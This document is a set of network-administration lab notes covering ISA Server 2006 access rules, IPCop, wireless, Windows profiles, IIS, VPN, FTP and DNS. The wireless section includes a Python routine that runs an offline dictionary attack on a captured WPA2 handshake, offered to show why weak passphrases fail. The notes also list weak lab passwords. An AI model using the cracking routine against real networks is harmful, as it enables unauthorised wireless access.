ISA Server 2006

1- Create a rule to allow Internet access for ISA and users
-----------------------------------------------------------------
-Open ISA Server => Array => Server name => Firewall Policy => Right-click
=> New => Access Rule... - Access rule name: Allow internet access for ISA
and Users => Action: Allow => All Outbound Traffic - From Source:
Local Host and Internal => Next => To Destination: External => Finish
=> Apply - Test: open the Internet both on the ISA machine and on a user PC.
*Note: ISA evaluates the firewall policy top-down and applies the first rule
that matches. This rule allows everything from the whole Internal network, so
every Deny rule created in the later sections must be moved ABOVE it
(right-click the rule => Move Up); below it, a Deny rule never matches.

------------------------------------------------------------------------
2- Create a rule to block Yahoo Messenger

-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
=> New => Access Rule... - Access rule name: Block YahooMSG => Action: Deny
=> Selected protocols => Add => New => Protocol... - name: Yahoo MSG => New
=> choose the following for the primary connection:
-Protocol type : TCP
-Direction : Outbound
-Port Range : From: 5000 To: 5050
=> Next (2) => Finish => Expand User-Defined => Double-click the protocol name
Yahoo MSG => Close - From Source: Internal => Next => To Destination: External
=> Finish => Apply - Test: sign in to Yahoo Messenger on a user PC.
*Note: this only blocks the messenger's native port (5050). The client can fall
back to HTTP on port 80 when that port is blocked, so a port rule alone is not
a reliable block; it also has to sit above the allow rule from section 1.
------------------------------------------------------------------------
3- Create a rule to block users from downloading software

-Open ISA Server => Array => Server name => Firewall Policy => Right-click
=> New => Access Rule... - Access rule name: Block download => Action: Allow
=> All Outbound Traffic - From Source: Internal => Next => To Destination: External
=> Finish => Apply - Right-click on this rule => Configure HTTP => Extensions
tab => Block specified extensions => Add the file extensions you want to block:
"exe, bat, com, dll, ocx, cab, rar, zip, tar, pif, js, vbs, flv, swf ..."
-Test: try to download software on a user PC, e.g. from allthesoft.com.
*Note: the HTTP filter only looks at the extension in the URL of plain HTTP
requests. A file served under another name (setup.ex_, download.php?id=1) or
over HTTPS is not caught, so treat this as a nuisance filter, not a control.

------------------------------------------------------------------------
4- Create a rule to block the website google.com
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
=> New => Access Rule... - Access rule name: Block Google.com => Action: Deny
=> All Outbound Traffic - From Source: Internal => Next => To Destination:
Add => New => URL Set => Name: Google => Add: http://google.com => OK
=> Expand URL Sets => Double-click the Google URL set => Close => Finish
-Test: open google.com on a user PC.
*Note: a URL set entry is matched against the whole URL, so http://google.com
does not cover www.google.com or other paths. Use http://*.google.com/* or,
simpler, a Domain Name Set containing *.google.com, which is matched on the
host name and therefore also covers HTTPS.

------------------------------------------------------------------------
5- Create a rule to block a user by IP address
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
=> New => Access Rule... - Access rule name: Block User IP => Action: Deny
=> All Outbound Traffic - From Source: Add => New => Computer - Name: XP1 => Computer
IP Address: 10.0.0.5 - Expand Computers => Double-click XP1 - Close - Next
-To Destination: External - Finish - Apply - Test: open the Internet on the user PC XP1.
*Note: the rule matches the source IP address, not the machine or the user. A
user who changes the PC's address (or simply gets a new DHCP lease) is no longer
matched; tie addresses to MACs with DHCP reservations, or build the rule on a
user/group with Firewall Client authentication if the block must follow the person.

------------------------------------------------------------------------
6- Create rules for restricted and unrestricted users

*For the Restricted Users rule:

-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
=> New => Access Rule... - Access rule name: Restricted Users => Action: Allow
=> Selected protocols - Add - choose the protocols: HTTP, HTTPS, DNS, POP3, POP3S,
SMTP, SMTPS, Yahoo MSG (the user-defined protocol from section 2)

=> From Source: Internal - Next - To Destination: External - Finish - Apply
-Right-click on this rule - Configure HTTP - Extensions tab
- Block specified extensions - add the file extensions you want to block:
exe, bat, com, dll, ocx, cab, rar, zip, tar, pif, js, vbs, flv, swf...


*For the Unrestricted Users rule:

-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
=> New => Access Rule... - Access rule name: Unrestricted Users => Action: Allow
=> All Outbound Traffic

=> From Source: Add => New - Computer - Name: ITPC - Computer IP Address:
10.0.0.10 - Expand Computers - Double-click ITPC - Close - Next - To Destination:
External - Finish - Apply

=> Test: open the Internet on both the IT computer and a user PC.
*Note: ITPC is also part of Internal, so the Unrestricted Users rule must sit
ABOVE Restricted Users; otherwise ITPC's web traffic matches the restricted rule
first and gets the extension block as well. The allow-all rule from section 1
must be removed (or limited to Local Host), or every protocol that is not in the
restricted list is still allowed by it.

------------------------------------------------------------------------
7- Bandwidth Splitter for ISA (third-party add-on)

*Install the software: bspliter2006.exe

-Open ISA Server => Array => Server Name => Expand Bandwidth Splitter - Right-
click Shaping Rules - New - Rule - Shaping rule name: 64/128 => Next - choose
"IP address sets specified below" => Add: Internal - Next - Destination: External
=> Next (2) - choose "Shape incoming and outgoing traffic" - Incoming (kbits/s): 64
and Outgoing (kbits/s): 128 - Next - choose "Assign bandwidth individually to each
applicable user/address" - Next - Finish - click Monitor to see who is downloading
and from which address...


------------------------------------------------------------------------
8- Create a rule to block a range of user IP addresses
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
=> New => Access Rule... - Access rule name: Block User IP Range => Action: Deny
=> All Outbound Traffic - From Source: Add => New => Address Range (or a Computer Set
containing that range) - Name: Accounting Range

=> Start address: 10.0.0.2 - End address: 10.0.0.15 - Expand the new object => Double-click
Accounting Range - Close - Next

=> To Destination: External - Finish - Apply

=> Test: open the Internet on a user PC whose address is in 10.0.0.2 - 10.0.0.15
(the rule must be above the allow rule from section 1, or the test will not work).
---------------------------------

=> Block only certain content types with this rule:

-Right-click (Block User IP Range) - Properties - Content Types tab - Selected content types...
-Check HTML Documents, Text ... => OK
(the Deny now applies only to HTTP responses of the selected content types;
anything else from the range falls through to the next rule)

- Test: open the Internet on a client with address 10.0.0.16, which is outside
the range and must not be affected.
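The rules from sections 1, 5, 6 and 8 only behave as intended when they are in the right order, because ISA applies the first matching rule and stops. The model below is an added example written for these notes (it is not ISA code and not from the original page): it evaluates an ordered policy the way the notes describe it, assumes every connection goes to the External network, and models the HTTP filter's extension block on the URL path. The addresses, rule names and protocol lists are the ones used in the sections above; the "SMB" protocol and the 192.168.5.5 address are made up for the test cases.

```python
"""Model of ISA Server 2006 access-rule evaluation: ordered rules, first match wins."""
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Network objects as used in the notes (constructed for this example).
LOCAL_HOST = [ipaddress.ip_network("127.0.0.0/8")]
INTERNAL = [ipaddress.ip_network("10.0.0.0/8")]


def computer(ip):
    """ISA 'Computer' object: a single address."""
    return [ipaddress.ip_network(f"{ip}/32")]


def address_range(first, last):
    """ISA 'Address Range' object, e.g. 10.0.0.2 - 10.0.0.15."""
    return list(ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)))


@dataclass
class Rule:
    name: str
    action: str                             # "allow" or "deny"
    sources: list                           # list of ip_network objects
    protocols: Optional[frozenset] = None   # None means "All Outbound Traffic"
    blocked_extensions: frozenset = frozenset()   # HTTP filter, Extensions tab


def url_extension(path):
    """Extension of the last path segment, ignoring any query string."""
    last = path.rsplit("/", 1)[-1].split("?", 1)[0]
    return last.rsplit(".", 1)[-1].lower() if "." in last else ""


def evaluate(policy, src_ip, protocol, path="/"):
    """Return (action, reason) for a connection from src_ip to the External network."""
    ip = ipaddress.ip_address(src_ip)
    for rule in policy:
        if not any(ip in net for net in rule.sources):
            continue
        if rule.protocols is not None and protocol not in rule.protocols:
            continue
        # The HTTP filter only sees plain HTTP. HTTPS is a CONNECT tunnel it
        # cannot look into, so extension blocking never applies to HTTPS.
        if rule.action == "allow" and protocol == "HTTP":
            ext = url_extension(path)
            if ext in rule.blocked_extensions:
                return "deny", f"{rule.name} (blocked extension .{ext})"
        return rule.action, rule.name
    return "deny", "Default rule"          # ISA's implicit last rule


BLOCKED = frozenset("exe bat com dll ocx cab rar zip tar pif js vbs flv swf".split())
RESTRICTED = frozenset(["HTTP", "HTTPS", "DNS", "POP3", "POP3S", "SMTP", "SMTPS", "Yahoo MSG"])

ALLOW_ALL = Rule("Allow internet access for ISA and Users", "allow", LOCAL_HOST + INTERNAL)
BLOCK_XP1 = Rule("Block User IP", "deny", computer("10.0.0.5"))
UNRESTRICTED = Rule("Unrestricted Users", "allow", computer("10.0.0.10"))
BLOCK_ACCT = Rule("Block User IP Range", "deny", address_range("10.0.0.2", "10.0.0.15"))
RESTRICTED_USERS = Rule("Restricted Users", "allow", INTERNAL, RESTRICTED, BLOCKED)

# Deny rules and the specific allow first, the broad allow last.
GOOD_ORDER = [BLOCK_XP1, UNRESTRICTED, BLOCK_ACCT, RESTRICTED_USERS, ALLOW_ALL]
# The section-1 rule left at the top: every rule below it is dead.
BAD_ORDER = [ALLOW_ALL, BLOCK_XP1, UNRESTRICTED, BLOCK_ACCT, RESTRICTED_USERS]

if __name__ == "__main__":
    cases = [("10.0.0.5", "HTTP", "/"), ("10.0.0.10", "FTP", "/"),
             ("10.0.0.12", "HTTP", "/"), ("10.0.0.30", "HTTP", "/setup.exe"),
             ("10.0.0.30", "HTTPS", "/setup.exe"), ("10.0.0.30", "SMB", "/")]
    for ip, proto, path in cases:
        print(f"{ip:10} {proto:6} {path:12} good order -> {evaluate(GOOD_ORDER, ip, proto, path)}"
              f"   bad order -> {evaluate(BAD_ORDER, ip, proto, path)}")
```

Running it shows the two points the notes leave implicit: with the allow-all rule on top nothing below it ever fires, and even in the good order the allow-all rule at the bottom still lets "restricted" users run any protocol that is not in the restricted list, while an .exe fetched over HTTPS passes the extension block untouched.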

---------------------------------

9- Redirect the internal network from a blocked website to another (facebook.com => iic.edu.kh):
-Open ISA Server => Array => Server Name => Firewall Policy => Right-click
=> New => Access Rule... - Access rule name: Deny Access facebook => Action: Deny
=> All Outbound Traffic - From Source: Internal - Next
-To Destination: New - URL Set - Name: facebook - New - http://*.facebook.com/* - OK
-Add - facebook - Next (2) - Finish - Right-click the rule "Deny Access facebook"
-Properties - Action tab - Deny - Check "Redirect HTTP requests to this Web page" - http://www.iic.edu.kh - OK

-Test: open facebook.com on a client; the browser should land on www.iic.edu.kh.
*Note: the redirect only works for plain HTTP. An HTTPS request to the site is
simply denied, because ISA cannot rewrite anything inside the TLS tunnel.

---------------------------------

10- Set up the VPN server and client:

=> Create a new group VPN_Group and a user vpn_user1 (Active Directory Users and
   Computers) and put the user in the group.

-Open ISA Server => Array => Server Name => Virtual Private Networks (VPN):

=> Step 1: Configure Address Assignment Method and enable VPN clients:
-Click Add => select the server name
-Set the private (static) IP range: From 172.16.0.1 To 172.16.0.10 => OK
-Click "Enable VPN Client Access" => Maximum number of VPN clients: 10
(the pool has 10 addresses, so an 11th client could not get an address anyway)

=> Step 2: Specify Windows Users => Add Group: VPN_Group

=> Step 3: Verify VPN Properties => Tick "Enable PPTP" => OK
 Remote Access Configuration (Access Networks) => Tick "External" (accept VPN
 connections on the WAN side) => OK
*Note: PPTP authenticates with MS-CHAPv2, whose handshake is known to be
breakable offline once captured; ISA 2006 also offers L2TP/IPsec, which should
be preferred wherever the clients support it.

=> Step 4: View Firewall Policy for the VPN Clients network:
-Right-click Firewall Policy => New => Access Rule
-Access rule name: Allow VPN Users to access Internal => Action: Allow
-All Outbound Traffic - From Source: VPN Clients - Next
-To Destination: Internal => Finish => Apply
(without this rule VPN users connect but reach nothing; narrow it to the
protocols and servers the users actually need rather than all traffic)

=> Step 5: View Network Rules (a route relationship VPN Clients -> Internal is
created automatically), then create a new VPN connection on a user PC on the
Internet as below:
.Username: vpn_user1
.Password: 123 (lab value only; a VPN account is a door from the Internet, so use a strong password)
.Gateway : 192.168.1.253 (public IP of the ISA WAN interface)

-Test: dial the VPN from the client on the Internet and reach the internal network through ISA.

Firewall (software and hardware)


Firewall:
- Monitors Internet traffic
- Restricts Internet usage
- Proxy: caches web pages (keeps a copy so the next request is served locally)
- VPN...

ISA firewall => needs 2 network cards
1. WAN network card: set the IP given by the ISP
2. LAN network card: set the local network IP


- Firewall: software & hardware

Firewall software:
- ISA Server: runs on Windows Server 2003
- IPCop: Linux-based
- Smoothwall
- MikroTik...


Hardware firewall:
- Cisco ASA, PIX => dedicated firewall appliances
- WatchGuard => appliance
- Linksys, D-Link => home/SOHO routers with a built-in firewall

ADSL router:
- Router
- Modem
- Switch
- Wi-Fi
------------------------------------------

Internet traffic:
- Incoming traffic: download
- Outgoing traffic: upload

- Send email: outgoing traffic
- Open yahoo.com: in + out
- Download software: in
- Upload a website to hosting: out
- User on the Internet connecting by VPN to the local office: incoming
- User on the Internet opening webmail on the local mail server: incoming
(incoming connections are the ones that need a publishing/inbound rule on the
firewall; everything else in these notes is an outbound access rule)

------------------------------------------

- Network: 4 categories (the network objects ISA uses in rules)
- Local Host: the firewall computer itself: 127.0.0.1
- Internal: LAN: local network
- External: WAN: Internet
- VPN Clients: remote users on the Internet dialled in to the local network
Router:
- WAN: 203.189.128.222
- LAN: 10.0.0.1

2000-2003
- Modem: converts the phone line signal to a network signal
- Router: NAT (maps the internal addresses to the one external address)
- Switch: shares the Internet connection inside the LAN

2005: Router: 3-in-1 (modem + router + switch in one box)

A. Install IPCop on VMware:
  -----------------------
1. Create a new machine in VMware
2. Insert the IPCop disc
3. Boot from the IPCop disc
4. Start the installation
- GREEN interface = LAN interface: 10.0.0.1
- RED interface   = WAN interface: 192.168.1.2

- Before installing IPCop:
=> 2 network cards
=> Add the second network card in VMware

VMware networks for the firewall:
- LAN (GREEN): VMnet2 (host-only, shared with the client VMs)
- WAN (RED): Bridged
--------------------------------

Passwords set during installation:
1. root password (console/SSH)
2. Web admin password (user "admin" of the web interface)
3. backup password
--------------------------------

B. Share the Internet to users:
  -----------------------

1- Check the IP of RED and GREEN on IPCop
   RED   = WAN = 192.168.1.2/24
   GREEN = LAN = 10.0.0.1/8

=> login: root
   password: 123456 (lab value)


=> setup
- Addresses of RED/GREEN
- DNS & gateway
- DHCP for clients

2. Set up the client for Internet access
-----------------------

=> Make sure the network adapter of the client VM is on VMnet2

=> The client's network card must be on the same network as the IPCop LAN (GREEN) interface

* Note:
to check that the Internet works on IPCop: ping google.com
=> if the name does not resolve, ping 203.189.128.1 (the ISP DNS) to tell a DNS
problem from a routing problem

3. Connect to IPCop using the web interface
--------------------------------------

- open IE: http://10.0.0.1:81 (redirects to the HTTPS interface on port 445)
=> username: admin / password: 123456

4. Install the add-on "Advanced Proxy"
--------------------------------
=> System - SSH Access - tick "SSH Access" (leave "Support SSH protocol version 1"
   unticked: SSHv1 is insecure, and neither WinSCP nor PuTTY needs it)
- Using WinSCP: copy the add-on file from Windows to the IPCop box
- Using PuTTY: log in and install it on IPCop
  cd .. = go up one directory
  pwd   = show the current directory
  ll    = list directories & files

- Unpack the advproxy archive:
  # tar -xzf ipcop-advproxy-3.0.3.tar.gz   (drop -z if the file is a plain .tar)

- Install advproxy:
  # ipcop-advproxy/install

- Check advproxy on IPCop (Services menu of the web interface):
   http://10.0.0.1:81


Setup Wireless/Security:
------------------------
1. Log in to the wireless router (Linksys)
- Open browser: 192.168.1.1
- Username: admin
- Password: admin (factory default: change it, it is the first thing anyone tries)

- SSID: wireless network name (ITS-Computer)
- Enable SSID Broadcast: show the wireless name
- Click Save
-------------------------------------
802.11 : Wi-Fi standard
Wireless B: 11 Mbps
Wireless G: 54 Mbps
Wireless N: 100-300 Mbps
-------------------------------------
Wireless:
WPAN: Bluetooth, infrared => personal area
WLAN: Wi-Fi => access point
WWAN: GSM, EDGE, 3G, 4G => cellular (microwave radio)
-------------------------------------

2. Set up security:

WPA2/PSK

WPA2: encrypts the wireless frames (AES-CCMP)
PSK: pre-shared key; authenticates wireless clients with one passphrase shared by everyone on the network

sent over the air: yahoo.com => %$%^$^$^%$^ (encrypted by WPA2)

3. Filter MAC addresses (wireless clients)
---------------------
- MAC address = hardware address = physical address = network card address
- IP address = software address = logical address
MAC = C8-3A-35-D1-7E-F1
(MAC addresses are sent in the clear even on an encrypted network and can be
changed in software, so a MAC filter only keeps out accidental clients)


---------------------


Wireless security:

- PSK: wireless password (everything rests on it: whoever captures the 4-way
  handshake can test guesses offline, so use a long random passphrase)
- WPA2: wireless encryption (do not fall back to WEP or WPA/TKIP)
- MAC filter
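What "PSK" and "WPA2" actually do with the passphrase, as an added example for these notes (it is not code from the page or from any router): the passphrase and SSID are stretched into the PMK, the 4-way handshake turns the PMK into the session keys, and the MIC on handshake message 2 is what lets an eavesdropper check passphrase guesses offline. The SSID and AP MAC are taken from the notes; the client MAC, nonces, EAPOL frame bytes and the passphrases are constructed for the example.

```python
"""WPA2-PSK key derivation, and why the passphrase is the whole security of the network."""
import hashlib
import hmac


def wpa2_pmk(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label | 0x00 | data | counter)."""
    out = b""
    for counter in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
    return out[:nbytes]


def wpa2_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the 4-way handshake values; for CCMP the first 16 bytes are the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1 over the frame, truncated to 128 bits."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, frame, mic, candidates):
    """Offline dictionary attack on a captured handshake: one PBKDF2 run per guess."""
    for guess in candidates:
        kck = wpa2_ptk(wpa2_pmk(guess, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), mic):
            return guess
    return None


# --- constructed handshake for the lab SSID (client MAC, nonces and frame are made up) ---
SSID = "ITS-Computer"
AP_MAC = bytes.fromhex("c83a35d17ef1")    # the MAC quoted in the notes, used here as the AP
STA_MAC = bytes.fromhex("001122334455")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
FRAME = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(109)   # EAPOL-Key msg 2, MIC field zeroed


def capture(passphrase):
    """What an attacker sniffs: the MIC the real client computed with the real passphrase."""
    kck = wpa2_ptk(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, FRAME)


if __name__ == "__main__":
    mic = capture("its-computer1")        # a weak, SSID-derived passphrase
    print(crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, FRAME, mic,
                ["password", "12345678", "its-computer", "its-computer1"]))
```

The PBKDF2 step is the only thing slowing a guesser down (4096 SHA-1 iterations per try), so a passphrase that appears in a word list or is derived from the SSID falls in seconds; the MAC filter and hidden SSID add nothing to this calculation.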

-----------------------------------------------

3 types of profile on a network server


Profile: there are three profiles
1- Local user profile: created automatically the first time a user logs on, as a copy of
   the default profile in Documents and Settings\Default User; it stays on that PC.
2- Roaming profile: a network profile, created the first time the user logs on to the domain;
   it is copied from the client PC to the server at log-off and back at log-on, so it follows
   the user to any PC.
3- Mandatory profile: like a roaming profile, but read-only: changes the user makes are
   discarded at log-off.
---------------------------------------------------------
2- Roaming profiles:
-Allow domain users to log on: (Group Policy Management - Edit) - Computer Configuration
 - Policies - Windows Settings - Security Settings - Local Policies
 - User Rights Assignment - Allow log on locally - Add (Domain Users) - OK
 - gpupdate /force - log off the server - log on with the user name.
 => C: (find the user's profile folder).
 (this grants every domain user interactive logon on the domain controller; fine for a
 one-machine lab, never for a production DC: log the user on at a workstation instead)
=> Log back on as administrator - My Computer - Properties - Advanced - User Profiles
 - Settings - <client user name> (roaming) - Copy To (D:\ or E:\Profile, shared,
   client-username directory); on the network the path must be \\server1\profile\client-username - OK.
=> Active Directory Users and Computers => right-click the user name => Properties => Profile
  - User profile - Profile path: \\server1\profile\client-username.

=> Test the profile of client-username

(To make the user an administrator: right-click user name => Properties => Member Of => Add => Domain Admins.
 Domain Admins means admin of the whole domain; for a lab only. If the user only needs to
 administer one PC, add the account to that PC's local Administrators group instead.)

3-Mandatory Profiles

     As I mentioned, mandatory profiles are simply read-only versions of
the standard roaming profiles I've already discussed. Creating a mandatory
profile is probably one of the simplest administrative tasks you'll ever
perform. If you look in each individual profile directory, you'll find
a hidden file called NTUSER.DAT. This file contains all the user-configurable
aspects of the profile. To create a mandatory profile, simply rename this
file NTUSER.MAN.

NTUSER.DAT => NTUSER.MAN
(also make the profile share read-only for the user: renaming the file stops changes
from being saved at log-off, it does not stop the user editing the files on the share)

*Conclusion
    As I've explained in this series, you can use profiles to make the
users' lives easier, your life easier, or both. Roaming and mandatory
profiles can be very handy to both administrators and users.

Build Web Server (IIS: Internet Information Services)

=> Can be used on an intranet and on the Internet
=> Used to host a website or to run web hosting
---------------------------------------------------
To protect against attackers, IIS 6.0 comes with:

a. A locked-down default: a fresh IIS 6.0 serves only static content (.htm, .jpg, .gif, .bmp ...);
   dynamic extensions such as ASP, ASP.NET and FrontPage Server Extensions stay "Prohibited"
   in Web Service Extensions until an administrator allows them (the IIS Lockdown Wizard did
   this job for IIS 5; on IIS 6 it is built in).

b. FTP user isolation: each FTP user is confined to its own home directory and cannot browse
   other users' folders or the rest of the server.

c. Low-privileged worker processes: application code runs as Network Service, not LocalSystem,
   so a compromised web application gets limited rights. On top of that:
-Access control : NTFS permissions and web permissions on the site content
-Authentication : proves who the user is (account & password, or Windows integrated)
-Encryption : SSL/TLS for online business (banking, credit cards ...)
-Auditing : logs who accessed which resource on the site.
-----------------------------------------------------
There are 4 IIS services:
a. File Transfer Protocol (FTP) server : upload and download files (port 21). User name,
   password and data travel in clear text.
b. Hypertext Transfer Protocol (HTTP) : serves web pages (HTML) and runs server-side code
   (ASP, ASP.NET; PHP with an add-on) (port 80; 443 with SSL).
c. Simple Mail Transfer Protocol (SMTP) : sends mail to the Internet.
d. Network News Transfer Protocol (NNTP) : newsgroups, as offered by ISPs.

---------------------------------------------------
1. Add the IIS components:
-Start => Administrative Tools => Manage Your Server
-Add or remove a role => choose Application Server (IIS, ASP.NET)
(follow the screens).
---------------------------------------------------
2. Set the directory path for storing the website:

-Start => Administrative Tools => Internet Information Services (IIS) Manager
-Expand Server name \ Web Sites \ Default Web Site => right-click it => Properties:

a. Web Site tab:
-Description : (vithya-computer)
-IP address : (192.168.168.168)

b. Home Directory tab:
-Local Path: (C:\inetpub\wwwroot)

-Script source access: the notes tick this; leave it UNTICKED on anything but a throwaway
 lab. With it on, a client with Read permission can download the source of your ASP files,
 and with Write permission can replace them.

c. Documents tab (set the index file "index.htm"):
=> Move index.htm to the top of the list
 to make it the default home page of the website.

=> OK - Select All - OK
---------------------------------------------------
3. Create a virtual directory:
=> Right-click (vithya-computer) - New - Virtual Directory
-Next - Alias: (vithya-computer)
-Path: (C:\Inetpub\wwwroot) - Next (2) - Finish

---------------------------------------------------
4. Create the website:
-Create a new file named index.htm and open it with Notepad => write some words
 you want - save it to (C:\inetpub\wwwroot).

5. Test opening the website:
-Open IE or Firefox on a client computer or on the server
-Type the IP address of the web server: (192.168.168.168)

Virtual Private Network (VPN) Server:
-------------------
-VPN : an encrypted tunnel over the Internet that joins a remote client or a remote network
 to the LAN as if it were local.

-VPN : there are 2 types:

a. User to network (remote access): one client on the Internet dials in to the corporate intranet.
b. Network to network (site to site): two offices joined across the Internet.

-------------------
1- VPN server:
(has 2 network interface cards:)
1-LAN: 192.168.168.168
2-WAN: 192.168.20.19

=> Start - Programs - Administrative Tools - Routing and Remote Access
=> Right-click (local host name) - Configure and Enable Routing and Remote Access - Next
 .Virtual Private Network (VPN) access and NAT - Next - private network interface (LAN)
-Next - From a specified range of addresses - New - (address pool for VPN clients)
=> 192.168.168.1 => 192.168.168.20
-Next - Finish - OK
(if the wizard offers to add static packet filters on the WAN interface so that only VPN
traffic is accepted there, keep them)


-------------------
2- Create user accounts in AD:

=> Start - Administrative Tools - Active Directory Users and Computers
-create new users, for example:

username: vpn1
password: 123

username: vpn2
password: 123
(lab values; a VPN account is a door from the Internet, so use strong passwords outside the lab)
=> Properties (vpn1 & vpn2) - Dial-in - Network Access Permission (Allow access) - OK

-------------------
3- Testing from a VPN client (on the Internet) to the VPN server:

=> Start - Run - ncpa.cpl - Create a new connection - Next
  - Connect to the network at my workplace
  - Virtual Private Network connection - Next - Company Name (VPN client)
  - Host name or IP address (192.168.168.168) - My use only - Tick (Add a shortcut ...)
  - Finish - User name: xxxx - Password: xxxx - Tick (Save this user name ...)
(a client on the Internet must dial the WAN address of the VPN server, 192.168.20.19 in the
layout above; 192.168.168.168 is the LAN side and is only reachable once the tunnel is up)



Addresses used in the labs (a VPN server needs 2 NICs):
LAN 192.168.1.1 / WAN 203.1.2.3
LAN 10.0.0.1    / WAN 192.168.1.253 (the ISA lab)

ping 10.0.0.2 (an internal PC) from the connected client to test the tunnel

Building FTP Server: (File Transfer Protocol) Service
-------------------
1- Add the FTP component in IIS:
=> Start - Control Panel - Add or Remove Programs
  - Add/Remove Windows Components - Application Server
  - Details... - Internet Information Services (IIS)
- Details... - File Transfer Protocol (FTP) Service - OK

2- Set the folder path to store files:
=> Start - Administrative Tools - IIS Manager

=> Expand the server name - click FTP Sites - "Click here to launch" in the right panel.

=> Expand the server name - right-click FTP Sites => New => FTP Site
-Next - Description: FTP Server => choose IP: (192.168.168.168)
and port: 21 => Next => FTP User Isolation: choose "Isolate users" if each user may only
see its own folder => Path: C:\inetpub\ftproot
=> Select: Read and Write => Next - Finish.
=> Right-click the FTP site just created => Start.

3- Set security for users to access the FTP site and disable anonymous access:
=> Right-click the FTP site => Permissions (NTFS on the folder)
- Give the group "Users" Modify rather than Full Control: full control lets any user
  change the permissions and take over the folder.

=> Right-click the FTP site => Properties => Security Accounts
- Untick "Allow anonymous connections"
(FTP sends the user name and password in clear text; with anonymous access off, every
login now exposes a domain password to anyone sniffing the network, so keep the server on
the LAN or use FTPS/SFTP instead)


4- Create a user account in AD & test FTP:

=> Start - Administrative Tools - Active Directory Users and Computers
-create a new user, for example: username: ftp_user and
password: 123

=> Open IE: ftp://192.168.168.168 => enter the user name and password you
just created - click the View menu => Open FTP Site in Windows
Explorer => retype the user name & password

=> Test: create a new folder and a new text file, or copy a document, on the
FTP site

=> Open C:\inetpub\ftproot => you will see the file & folder you created.

Build DNS Server: DNS (Domain Name System)

 a- DNS is an Internet service that translates domain names to IP addresses. Names are easy to
remember, but the Internet routes on IP addresses, so every time we use a domain name it is
translated to an IP address first.
 b- DNS also stores the host records of every computer on the network, so they can find each other.
ex. www.google.com  ip address = 64.233.167.147
.com for business
.net for network providers
.edu for education
.org for organisations
.gov for government
.kh  country code for Cambodia (Khmer)
www.iic.edu.kh.
----------------

1. Set a fixed (static) IP on the server
IP address : 192.168.21.254
Subnet mask: 255.255.255.0
Default gateway: 192.168.21.1
DNS : 192.168.21.254 (the server points to itself)

2. Configure DNS:

a- Create a forward lookup zone: maps names to IP addresses

=> When you build a domain controller the forward zone is created automatically.
=> But we can delete it and recreate the forward zone
   -Delete everything under Forward Lookup Zones - right-click (Forward Lookup Zones) - New Zone wizard
   -Next (3) - Zone name (iic.edu.kh) - Next (2) - Finish
   (on a real domain controller do not delete the zone: it holds the _msdcs/_tcp SRV records the
   domain needs to work; this is a standalone-DNS lab exercise)

=> After creating the forward zone => create the A record: it points a host name to an IP address
   -Right-click (iic.edu.kh) => New Host (A) - Name (host name of the server) Server1 - IP address (192.168.21.254)
-Add Host - OK - Done


b- Create a reverse lookup zone: maps IP addresses to names

     -Right-click (Reverse Lookup Zones) - New Zone - Next (3) - Network ID: 192.168.21 - Next (2) - Finish
     (the zone is named 21.168.192.in-addr.arpa)

=> After creating the reverse zone => create the PTR record: it points an IP address to a host name
    -Right-click (192.168.21.x Subnet) - New Pointer (PTR) - Host IP number 254 - Browse (server1.iic.edu.kh)
    (ticking "Create associated pointer (PTR) record" when adding the A record does this automatically)

3. Test DNS:
- C:\>nslookup            (the prompt shows the default server: server1.iic.edu.kh, 192.168.21.254)
- > server1.iic.edu.kh    (forward lookup: A record)

4. Test the reverse lookup zone
- > 192.168.20.7 => En(the notes use this address; pick one that has a PTR record in your zone)

5. Show the nslookup settings:
- > set all

6. Show the full query and response:
- > set debug
  > iic.edu.kh


    - > set q=any
      > yahoo.com
      > hotmail.com

Before testing DNS on Windows Server 2008 the notes disable IPv6, so that nslookup
uses the IPv4 address of the local DNS server.

=> This test works for DNS; with the nslookup command "set q=any" you can query any domain name
 for DNS records like A, MX, CNAME ... and NS records.


=> The query for hotmail.com is resolved (through forwarders or root hints) by the local DNS
server we just created:

- internet address = 64.4.20.174  => A record (points a name to an IP)
- nameserver = ns2.msft.net => NS record (points to the DNS server for the zone)

- mail exchanger = mx1.hotmail.com => MX record (points to the mail server)

- primary name server = ns1.msft.net
responsible mail addr = msnhst.microsoft.com
serial  = 2010082401
refresh = 1800 (30 mins)
retry   = 900 (15 mins)
expire  = 2419200 (28 days)
default TTL = 3600 (1 hour)

=> All of the above is the SOA record (Start of Authority): it tells secondary servers how often
to refresh the zone, when to retry after a failed refresh and when to stop answering for it
(expire); the serial number goes up every time the zone is edited.
